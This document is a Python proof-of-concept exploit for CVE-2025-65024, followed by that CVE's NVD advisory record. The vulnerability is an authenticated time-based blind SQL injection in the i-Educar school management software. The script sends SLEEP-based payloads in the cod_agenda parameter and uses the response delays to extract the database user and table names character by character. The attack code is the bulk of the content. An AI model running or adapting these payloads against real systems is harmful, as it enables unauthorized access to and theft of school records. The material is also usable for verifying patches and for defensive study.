CVE-2025-65024

# CVE-2025-65024 Time-based SQL Injection PoC # Target: i-Educar <= 2.10.0 # Endpoint: /ieducar/intranet/agenda_admin_cad.php?cod_agenda=[payload] import requests import time import string target_url = "http://target.com/ieducar/intranet/agenda_admin_cad.php" # Assume valid session cookie is obtained after authentication cookies = { "PHPSESSID": "your_authenticated_session_id" } def sql_injection_time_based(payload): """Send time-based SQL injection payload and measure response time""" params = {"cod_agenda": payload} start_time = time.time() response = requests.get(target_url, params=params, cookies=cookies, timeout=30) elapsed = time.time() - start_time return elapsed, response.status_code def extract_data_via_time_based_blind_injection(): """Example: Extract database user using time-based blind injection""" charset = string.ascii_lowercase + string.digits + "_@." result = "" print("[*] Starting time-based blind SQL injection...") # Example: Extract current database user (length extraction) for length in range(1, 30): payload = f"1' AND (SELECT CASE WHEN (LENGTH(CURRENT_USER())={length}) THEN SLEEP(3) ELSE 0 END)--" elapsed, _ = sql_injection_time_based(payload) if elapsed >= 3: print(f"[+] Database user length: {length}") break # Example: Extract database user character by character for pos in range(1, length + 1): for char in charset: payload = f"1' AND (SELECT CASE WHEN (SUBSTRING(CURRENT_USER(),{pos},1)='{char}') THEN SLEEP(3) ELSE 0 END)--" elapsed, _ = sql_injection_time_based(payload) if elapsed >= 3: result += char print(f"[*] Position {pos}: {result}") break print(f"[+] Extracted database user: {result}") return result def extract_database_tables(): """Extract table names from information_schema""" tables = [] charset = string.ascii_lowercase + string.digits + "_" for table_idx in range(50): # Limit to 50 tables table_name = "" for char_pos in range(1, 50): found = False for char in charset: # Extract table name using substring and sleep payload = f"1' AND (SELECT CASE WHEN (SUBSTRING((SELECT table_name FROM information_schema.tables LIMIT {table_idx},1),{char_pos},1)='{char}') THEN SLEEP(2) ELSE 0 END)--" elapsed, _ = sql_injection_time_based(payload) if elapsed >= 2: table_name += char found = True break if not found: break if table_name: tables.append(table_name) print(f"[+] Found table: {table_name}") else: break return tables if __name__ == "__main__": print("[*] CVE-2025-65024 - i-Educar Time-based SQL Injection") print("[*] Target: i-Educar <= 2.10.0") print("[*] File: agenda_admin_cad.php") print("[*] Parameter: cod_agenda") # Test basic connectivity and time-based injection print("\n[*] Testing basic connectivity...") test_payload = "1' AND 1=1--" elapsed, status = sql_injection_time_based(test_payload) print(f"[*] Response time: {elapsed:.2f}s, Status: {status}") # Test time-based injection detection print("\n[*] Testing time-based injection...") sleep_payload = "1' AND SLEEP(5)--" elapsed, _ = sql_injection_time_based(sleep_payload) print(f"[*] SLEEP(5) response time: {elapsed:.2f}s") if elapsed >= 4: print("[+] Time-based SQL injection confirmed!") print("\n[*] Extracting database information...") extract_data_via_time_based_blind_injection() extract_database_tables() else: print("[-] Injection test failed - target may not be vulnerable or different payload required")

{"cve": {"id": "CVE-2025-65024", "sourceIdentifier": "[email protected]", "published": "2025-11-19T16:15:49.783", "lastModified": "2025-11-20T17:11:17.360", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "i-Educar is free, fully online school management software. In versions 2.10.0 and prior, an authenticated time-based SQL injection vulnerability exists in the ieducar/intranet/agenda_admin_cad.php script. An attacker with access to an authenticated session can execute arbitrary SQL commands against the application's database. This vulnerability is caused by the improper handling of the cod_agenda GET parameter, which is directly concatenated into an SQL query without proper sanitization. This issue has been patched in commit 3e9763a."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:portabilis:i-educar:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.10.0", "matchCriteriaId": "877348AB-B600-47B3-A565-8198483C6414"}]}]}], "references": [{"url": "https://github.com/portabilis/i-educar/commit/3e9763a561b328edaed21a7dc2e0dba0bbbc6e22", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/portabilis/i-educar/security/advisories/GHSA-6c8p-xqcv-rghx", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}